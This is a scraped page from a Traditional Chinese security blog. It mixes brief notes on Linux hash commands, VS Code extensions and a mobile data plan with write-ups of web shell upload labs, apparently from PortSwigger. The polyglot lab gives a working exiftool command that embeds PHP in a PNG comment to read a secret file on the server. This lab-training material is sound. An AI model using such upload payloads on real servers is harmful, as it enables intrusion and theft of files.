利用 Linux command 取得檔案 hash 值
Note
hash 值是經過特定的演算法,取得資料的唯一值,是不可逆的函數,也就是說無法利用 hash 值來回推原本的檔案內容。利用 hash 值的特性可以用來判斷檔案是否有異動,比較是否為相同的檔案。
之前介紹了 Windows 中取得檔案 hash 值的方式。在這邊列出幾個 Linux 上取得 hash 值的指令。
之前介紹了 Windows 中取得檔案 hash 值的方式。在這邊列出幾個 Linux 上取得 hash 值的指令。
VS Code是一個相當好用的軟體,除了提供開發的功能外,他的 extension 更可以讓 VS Code 的使用範圍擴大,在資安工作上也相同的幫助。以下整理了幾個常用的extension。
在執行資安工作時,不論是事件、惡意程式分析或滲透,都會需要獨立的線路。尤其是在家工作時,相較牽新的線路,使用 4G 網路會是很好的選擇,而**無框行動 Circles.Life** 的方案相當值得推薦。搭配 4G LTE 無線路由器可快速建立獨立線路。
Lab: Remote code execution via polyglot web shell upload
sudo apt install libimage-exiftool-perl
來安裝。exiftool -Comment="<?php echo ' FLAG_START ' . file_get_contents('/home/carlos/secret') . ' FLAG_END '; ?>" <image_file>.png -o payload.php
FLAG_START
、 FLAG_END
加以區別。payload.php
上傳後,存取/files/avatars/payload.php
即可取得此Lab的Flag。在執行 php 檔時,會從<?
開始到?>
結束,因此將 php code 內容放在 png 的 comment 中,再存成 .php 檔,會把其他內容當成亂碼,但執行放在 comment 的 php code。
Lab: Web shell upload via obfuscated file extension
跟上一個lab相同,利用上傳漏洞將目標主機上/home/carlos/secret
檔案內容輸出,再將輸出的內容subsmit。
Lab: Web shell upload via extension blacklist bypass
跟上一個lab相同,利用上傳漏洞將目標主機上/home/carlos/secret
檔案內容輸出,再將輸出的內容subsmit。